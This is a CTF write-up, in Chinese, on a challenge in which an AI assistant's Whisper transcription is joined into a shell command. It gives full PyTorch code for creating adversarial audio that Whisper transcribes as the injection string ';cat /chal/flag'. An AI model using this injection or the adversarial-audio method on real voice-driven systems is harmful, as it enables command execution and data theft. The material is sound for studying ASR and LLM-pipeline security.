Blind

题目设计

Thanks to the Real Hacker w1z(bi0s). What cool chall!

本题描述了一个现实场景常见的模型:即无法采用多模态模型时,先使用ASR模型将语音转换为文字,接着调用大模型进行回答。
本题通过制作命令注入的漏洞点,期待选手对于Whisper模型的架构理解、音频解析方式、梯度传导和优化等细节进行探索。

再次致谢w1z。在7小时长烤,最后拿到题目一血后,这道题让我觉得十分的特别。再次思考了我对于题目的解决过程后,将题目修改并放到了线下的断网环境。

WriteUP

题目是一个AI助手,可以选择文字交流,或者上传音频进行对话。
代码审计发现 app.py 中语音识别模块存在命令拼接,将ASR模型识别的输出直接拼接,从而RCE

在下述代码发现模型输出中,包括了命令拼接所需要的符号:

那么可以尝试构造对抗样本,使得模型输出为

1
';cat /chal/flag'

拼接后变为

1
python3 chatbot.py '';cat /chal/flag''

通过源码(或者论文),whisper模型本质是encoder-decoder结构,大致过程可以描述为

进行对抗样本即可。

首先:需要在音频处理环节了解那些部分最终进入了模型,那些是预处理。这样才能合理捕捉梯度。

接着,在拿到梯度信息后,我们会思考,如何利用每一轮的梯度?下面给出几种不同的方式:

一直循环,逐token的方式去优化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
for i in range(num_iterations):
tokens = torch.tensor([[50257, 50362]], device=DEVICE) # [SOT, EN]

for j in range(100000):
for target_token in target_tokens:
optimizer.zero_grad()

mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)
mel = pad_or_trim(mel, 3000).to(model.device)
audio_features = model.embed_audio(mel)

logits = model.logits(tokens, audio_features)[:, -1]

if torch.argmax(logits, dim=1) == target_token:
break

loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
loss.backward()
optimizer.step()

tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)

print(tokens.tolist())

很烂,预测是一个整体过程,优化后得到了:[SOT, token1, EN]

但是无法保证在下次优化token2时,token1不被扰动。很容易在下次变为:[SOT, bad_token, token2, EN]

或者是累积梯度一次优化:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
for i in range(num_iterations):
tokens = torch.tensor([[50257, 50362]], device=DEVICE) # [SOT, EN]
total_loss = 0
for target_token in target_tokens:
optimizer.zero_grad()

mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)
mel = pad_or_trim(mel, 3000).to(model.device)
audio_features = model.embed_audio(mel)

logits = model.logits(tokens, audio_features)[:, -1]
loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
total_loss += loss
tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)

total_loss.backward()
optimizer.step()
adv.data = adv.data.clamp(-1, 1)

print(tokens.tolist())

也很烂,梯度累积太大了,很容易迷失在噪声中,根本找不到优化方向。

那么缩小噪声,每次优化从现实出发是,target tokens按照现实情况来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
for i in range(num_iterations):
tokens = torch.tensor([[50257, 50362]], device=DEVICE) # [SOT, EN]
total_loss = 0
for target_token in target_tokens:
optimizer.zero_grad()

mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)
mel = pad_or_trim(mel, 3000).to(model.device)
audio_features = model.embed_audio(mel)

logits = model.logits(tokens, audio_features)[:, -1]
loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
total_loss += loss
tokens = torch.cat([tokens, torch.tensor([[torch.argmax(logits, dim=1)]], device=DEVICE)], dim=1)

total_loss.backward()
optimizer.step()
adv.data = adv.data.clamp(-1, 1)

print(tokens.tolist())

bad,现实情况是梯度刚开始很好,后来慢慢炸掉。

EXP

最终笔者找到了一种逐token去优化的方式,通过提前对齐来保证梯度不乱掉。

下面exp由笔者亲自书写,得到了题目作者的称赞。并且原作者wiz的Official WP中也使用了这一版,并不存在抄袭一说。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import torch
from whisper import load_model
from whisper.audio import log_mel_spectrogram, pad_or_trim
from whisper.tokenizer import get_tokenizer
import torchaudio
from torch import nn

DEVICE = "mps"
target_text = "';cat /chal/flag'"
model = load_model("tiny.en.pt")
model.eval()
tokenizer = get_tokenizer(
model.is_multilingual,
num_languages=model.num_languages,
language="en",
task="transcribe",
)
target_tokens = tokenizer.encode(target_text)
target_tokens = target_tokens + [50256]

print(target_tokens)


adv = torch.randn(1, 16000*15, device=DEVICE, requires_grad=True)
optimizer = torch.optim.Adam([adv], lr=0.01)
loss_fn = nn.CrossEntropyLoss()

num_iterations = 50
for i in range(num_iterations):
tokens = torch.tensor([[50257, 50362]], device=DEVICE) # [SOT, EN]
for target_token in target_tokens:
optimizer.zero_grad()

mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)
mel = pad_or_trim(mel, 3000).to(model.device)
audio_features = model.embed_audio(mel)

logits = model.logits(tokens, audio_features)[:, -1]
loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
loss.backward()
optimizer.step()
adv.data = adv.data.clamp(-1, 1)

tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)

print(tokens.tolist())
print(f"Iteration {i+1}/{num_iterations}, Loss: {loss.item():.4f}")


torchaudio.save("adversarial.wav", adv.detach().cpu(), 16000)

print("\nTranscribing generated adversarial audio:")
result = model.transcribe(adv.detach().cpu().squeeze(0))

吐槽

赛前放题是什么操作???

线下赛有21支队伍解出,真心感到CN CTF的实力大幅进步,欢迎来NK或者r3带我……

koali : “写的不错,下次继续写”